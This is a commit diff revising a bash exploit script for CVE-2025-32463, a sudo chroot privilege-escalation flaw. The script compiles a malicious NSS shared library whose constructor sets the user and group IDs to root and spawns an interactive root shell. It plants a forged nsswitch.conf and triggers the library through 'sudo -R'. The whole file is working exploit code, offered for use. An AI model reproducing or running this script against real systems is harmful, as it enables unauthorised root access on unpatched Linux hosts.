Update CVE-2025-32463.sh

CVE-2025-32463.sh

@@ -3,44 +3,44 @@
 
 set -e
 
-echo "[+] Préparation de l'environnement..."
-
-STAGE=$(mktemp -d /tmp/sudopwn.XXXXXX) || { echo "[-] Échec mktemp"; exit 1; }
-cd "$STAGE" || exit 1
-
-
-command -v gcc >/dev/null 2>&1 || { echo "[-] gcc est requis"; exit 1; }
-command -v sudo >/dev/null 2>&1 || { echo "[-] sudo est requis"; exit 1; }
-
+STAGE=$(mktemp -d /tmp/sudopwn.XXXXXX)
+cd "$STAGE"
 
 cat > pwn.c <<EOF
 #include <stdlib.h>
 #include <unistd.h>
 
-__attribute__((constructor)) void pwn() {
-  setreuid(0, 0);
-  setregid(0, 0);
-  chdir("/");
-  execl("/bin/bash", "/bin/bash", NULL);
+__attribute__((constructor)) void pwn(void) {
+    setreuid(0, 0);
+    setregid(0, 0);
+    
+    chdir("/root");
+    
+    char *env[] = { 
+        "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", 
+        "TERM=$TERM", 
+        "HOME=/root", 
+        "USER=root", 
+        "LOGNAME=root", 
+        NULL 
+    };
+    
+    if (access("/bin/bash", X_OK) == 0) {
+        execle("/bin/bash", "bash", "-i", NULL, env);
+    } else {
+        execle("/bin/sh", "sh", "-i", NULL, env);
+    }
+    _exit(0);
 }
 EOF
 
-
-mkdir -p root/etc root/libnss_
+mkdir -p root/etc libnss_
 echo "passwd: /pwn" > root/etc/nsswitch.conf
 cp /etc/group root/etc
 
+gcc -shared -fPIC -Wl,-init,pwn -o libnss_/pwn.so.2 pwn.c
 
-echo "[+] Compilation de la payload..."
-gcc -shared -fPIC -Wl,-init,pwn -o root/libnss_/pwn.so.2 pwn.c || { echo "[-] Compilation échouée"; exit 1; }
+sudo -R root pwn
 
-
-echo "[+] Lancement de sudo avec chroot piégé..."
-sudo -R root pwn || echo "[-] Sudo échoué ou vulnérabilité non exploitable ici."
-
-
-echo "[*] Suppression de l'environnement temporaire..."
+cd /tmp
 rm -rf "$STAGE"
-
-echo "[+] Terminé."
-